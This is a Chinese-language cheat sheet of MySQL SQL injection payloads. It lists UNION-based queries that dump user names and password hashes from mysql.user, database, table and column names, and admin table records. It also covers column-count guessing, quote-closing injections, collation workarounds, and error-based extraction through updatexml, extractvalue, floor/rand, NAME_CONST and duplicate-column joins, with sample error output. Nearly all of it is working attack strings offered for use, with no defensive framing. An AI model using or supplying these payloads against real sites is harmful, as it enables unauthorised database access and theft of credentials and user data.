比较重要的系统参数
@@datadir 数据存放路径 @@basefir 安装路径 @@group_concat_max_len GROUP_CONCAT函数最多返回长度 @@version 版本号(5.5.23等) @@version_comment 版本说明(MySQL Community Server (GPL)等) @@version_compile_os 操作系统版本(win32等) @@version_compile_machine 操作系统平台(x86等) @@plugin_dir 插件路径
利用联合查询获得信息
查询信息
and 1=2 union select concat_ws(0x5f,user(),database(),@@version_comment,version())
查询数据库用户
and 1=2 union select GROUP_CONCAT(user,0x5f,password) from mysql.user
and 1=2 union select GROUP_CONCAT(user,0x5f,password) from (select user,password from mysql.user)t
and 1=2 union select GROUP_CONCAT(s) from (select concat_ws(0x5f,user,password)s from mysql.user)t
查询所有数据库(如果有多个的话)
and 1=2 union select GROUP_CONCAT(schema_name) from information_schema.schemata
and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata)t
and 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata where schema_name not in ('information_schema','performance_schema'))tand 1=2 union select GROUP_CONCAT(schema_name) from (select schema_name from information_schema.schemata where schema_name not in (0x696E666F726D6174696F6E5F736368656D61,0x706572666F726D616E63655F736368656D61))t
查询所有表名
注意:GROUP_CONCAT返回字符长度受group_concat_max_len参数影响,database()的位置可以换为数据库名的十六进制字符串(0x开头)
and 1=2 union select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()
and 1=2 union select GROUP_CONCAT(table_name) from (select * from information_schema.tables where table_schema=database())t
查询指定表所有列名
注意:之所以限定database是因为可能存在同名表(位于另外数据库)。
and 1=2 union select GROUP_CONCAT(column_name) from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database()
and 1=2 union select GROUP_CONCAT(column_name) from (select * from information_schema.columns where table_name=0x61646D696E and TABLE_SCHEMA=database())t
查询admin中的一条记录使用_分割
注意:CONCAT函数拼接时只要其中一个字段值是NULL,那么将返回NULL,而concat_ws不会,但会跳过任何字段值是NULL的字符串。
and 1=2 union select concat(name,0x5F,password,0x5F) from admin limit 1 and 1=2 union select concat_ws(0x5F,name,password) from admin limit 1
以逗号拼接admin中的所有数据(子查询每条数据使用_分割)
and 1=2 union select GROUP_CONCAT(s) from (select concat_ws(0x5F,name,password)s from admin)t
注意:上面这条语句没有使用group by语法,因为需要全部返回。可以对比:
[and 1=2 union select name,GROUP_CONCAT(s) from (select name,concat_ws(0x5F,name,password)s from admin)t group by name limit 1,1]
也可以:
and 1=2 union select GROUP_CONCAT(name,0x5F,password) from admin
注意:上面这条语句没有使用group by语法,因为需要全部返回。可以对比:
[and 1=2 union select name,GROUP_CONCAT(name,0x5F,password) from admin group by name limit 1,1]
猜解字段数
and 1=2 union select 1 ..... and 1=2 union select 1,1,.....1,1
这样有几个1,说明有几个字段,然后选择其中的某个位置作为较佳显示位。
不能使用union时,可以:
order by 10 success order br 11 error fields num:10
也可以:
group by 10 success group by 11 error fields num:10
当注射后页面显示:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
可以使用convert()函数
如
and 1=2 union select convert(GROUP_CONCAT(name,0x5F,password) using latin1) from admin
似乎可以使用unhex(hex())方式
and 1=2 union select unhex(hex(GROUP_CONCAT(name,0x5F,password))) from admin
Illegal mix of collations for operation 'UNION'
使用hex函数
and 1=2 union select hex(GROUP_CONCAT(name,0x5F,password)) from admin
猜解是否存在表
and 0<>(select count(*) from admin)
猜解表行数
and 0<(select count(*) from admin) ok and 1<(select count(*) from admin) no num:1
猜解字段名
and 1=(select count(*) from admin where length(name)>0)
猜解字段长度
and 1=(select count(*) from admin where length(name)>6) 错误 and 1=(select count(*) from admin where length(name)>5) 正确 长度是6 and 1=(select count(*) from admin where length(name)=6) 正确
id=1 其中 1有单引号包裹。('未被转义)
'and 1 =2 union select concat_ws(0x5f,user,password) from mysql.user where user!='null
最终:
select * from admin where id='1['and 1 =2 union select concat_ws(0x5f,user,password) from mysql.user where user!='null]'
这里[]间是注入语句
利用报错获得信息
1、不存在函数报错
sql:select * from t1 where id = a() injiect:a() error:#1305 - FUNCTION test.a does not exist
数据库为test
2、updatexml报错(0x5c,0x7e)
注:该报错允许字符范围为32个字符。
sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select version()),0x7e),1) injiect:and updatexml(1,concat(0x7e,(select version()),0x7e),1) error:#1105 - XPATH syntax error: '~5.5.23~'
数据库版本为5.5.23
sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select GROUP_CONCAT(schema_name) from information_schema.schemata),0x7e),1)
注:该方式只能看见部分。
sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x5f,(select schema_name from information_schema.schemata limit 1,1),0x5f),1)
注:该语句不报错。
sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),1) error:#1105 - XPATH syntax error: '~test~'
一个数据库为test
sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=0x74657374 LIMIT 0,1),0x7e),1) error:#1105 - XPATH syntax error: '~t1~'
一个数据表为t1
sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='t1' LIMIT 0,1),0x7e),1) error:#1105 - XPATH syntax error: '~id~'
一个数据字段为id
sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select concat(name,0x3a,pass) from t1 limit 0,1),0x7e),1) error:#1105 - Character set 'ucs2' is not supported by XPATH sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select hex(concat(name,0x3a,pass)) from t1 limit 0,1),0x7e),1)
sql:SELECT * FROM t1 WHERE id= 1 and updatexml(1,concat(0x7e,(select concat(name) from t1 limit 0,1),0x7e),1) error:#1105 - XPATH syntax error: '~ad123~'
数据name字段值 ad123
3、通过floor报错,Duplicate entry
sql:SELECT * FROM t1 WHERE id= 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) error:#1062 - Duplicate entry '5.5.231' for key 'group_key'
数据库版本为5.5.231
sql:SELECT * FROM t1 WHERE id= 1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) error:#1062 - Duplicate entry 'test@localhost1' for key 'group_key'
用户名为test@localhost
sql:SELECT * FROM t1 WHERE id= 1 and (select 1 from (select count(*),concat((select concat(pass) from test.t2 where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
将concat第一个参数换为子查询,并不暴Duplicate entry,不知何故。
注:经过仔细分析得到,子查询获得的数据必须具有‘唯一’属性(不是唯一值,依据表本身结构),比如:id主键,name唯一,pass没有主键属性。则会报错的可以为:id;name;concat(id);concat(id,name)等.但不报错的为pass;concat(pass);concat(id,pass)等.
4、extractvalue报错(0x5c,0x7e)
注:字符限制在32个字符
每次获得1个表
SELECT * FROM t1 WHERE id= 1 and extractvalue(1, concat(0x7e, (select table_name from information_schema.tables limit 0,1)));
每次获得多个表(这里三个)
SELECT * FROM t1 WHERE id= 1 and extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables limit 0,3)));
5、利用NAME_CONST注入(mysql version >=5.0.12)
注:如果版本(已知>5.1.35,其他未测试)会错误:Incorrect arguments to NAME_CONST,参数必须const
SELECT * FROM t1 WHERE id= 1 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)
SELECT * FROM test.t1 WHERE id= 1 and 1=(select * from (select NAME_CONST((select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1),NAME_CONST((1),1)) as x)
报错获得列
注:似乎必须至少知道一个字段
SELECT * FROM test.t1 WHERE id= 1 and (select * from(select * from test.t2 a join test.t2 b using(id,name))c); error:Duplicate column name 'pass'
另一个字段pass
SELECT * FROM test.t1 WHERE id= 1 and (select * from(select * from test.t2 a join test.t2 b using(id,name,pass))c);
另一个字段sta
